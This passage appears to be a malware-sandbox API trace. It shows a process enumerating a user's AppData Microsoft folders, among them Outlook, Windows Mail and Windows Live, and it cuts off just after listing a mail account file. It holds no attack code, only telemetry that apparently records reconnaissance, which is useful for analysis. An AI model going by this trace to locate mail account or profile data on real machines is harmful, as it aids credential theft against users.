lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0221.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0221.587] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.587] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.587] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe91c6830, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="17.3.4604.0120", cAlternateFileName="173460~1.012")) returned 1 [0221.587] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf26feb50, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe9617010, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x44aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0221.587] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 1 [0221.587] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 0 [0221.587] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.588] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0221.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.588] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0221.588] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.588] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.589] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2ce8e9d0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2ce8e9d0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gliding", cAlternateFileName="")) returned 1 [0221.589] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d32b470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21cff0f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21cff0f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="mapisvc.inf", cAlternateFileName="")) returned 1 [0221.589] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 1 [0221.589] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 0 [0221.589] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.589] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0221.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.589] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0221.589] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.589] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107d8460, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x10aabe80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x10aabe80, ftLastWriteTime.dwHighDateTime=0x1d706a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x46c35e30, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x46c35e30, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Burn", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x462fb4a0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x462fb4a0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Caches", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x182897a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Explorer", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x797ef170, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef3b9d6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameExplorer", cAlternateFileName="GAMEEX~1")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb1ed8fe0, ftCreationTime.dwHighDateTime=0x1d73a91, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xa18da600, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell", cAlternateFileName="POWERS~1")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7977cd50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7977cd50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ringtones", cAlternateFileName="RINGTO~1")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd49789d0, ftCreationTime.dwHighDateTime=0x1d72469, ftLastAccessTime.dwLowDateTime=0xd49789d0, ftLastAccessTime.dwHighDateTime=0x1d72469, ftLastWriteTime.dwLowDateTime=0xd49789d0, ftLastWriteTime.dwHighDateTime=0x1d72469, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc6aba9c0, ftLastAccessTime.dwHighDateTime=0x1d7e780, ftLastWriteTime.dwLowDateTime=0xd5fe90f0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b0ee50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd5fc2f90, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x1e400, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat.LOG1", cAlternateFileName="USRCLA~2.LOG")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79b0ee50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b0ee50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9c5705f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat.LOG2", cAlternateFileName="USRCLA~1.LOG")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x962222ec, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TM.blf", cAlternateFileName="USRCLA~1.BLF")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x961fc18b, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="USRCLA~2.REG")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x961fc18b, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="USRCLA~1.REG")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796e47d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d26e3cf, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WER", cAlternateFileName="")) returned 1 [0221.590] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796e47d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d26e3cf, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WER", cAlternateFileName="")) returned 0 [0221.590] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.591] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0221.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.591] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0221.591] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.640] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.640] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d03c30, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf52e20f0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf52e20f0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bici", cAlternateFileName="")) returned 1 [0221.640] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d03c30, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf52e20f0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf52e20f0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bici", cAlternateFileName="")) returned 0 [0221.640] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.641] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0221.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.641] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0221.641] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.685] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.685] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0221.685] FindNextFileW (in: hFindFile=0x76a908, 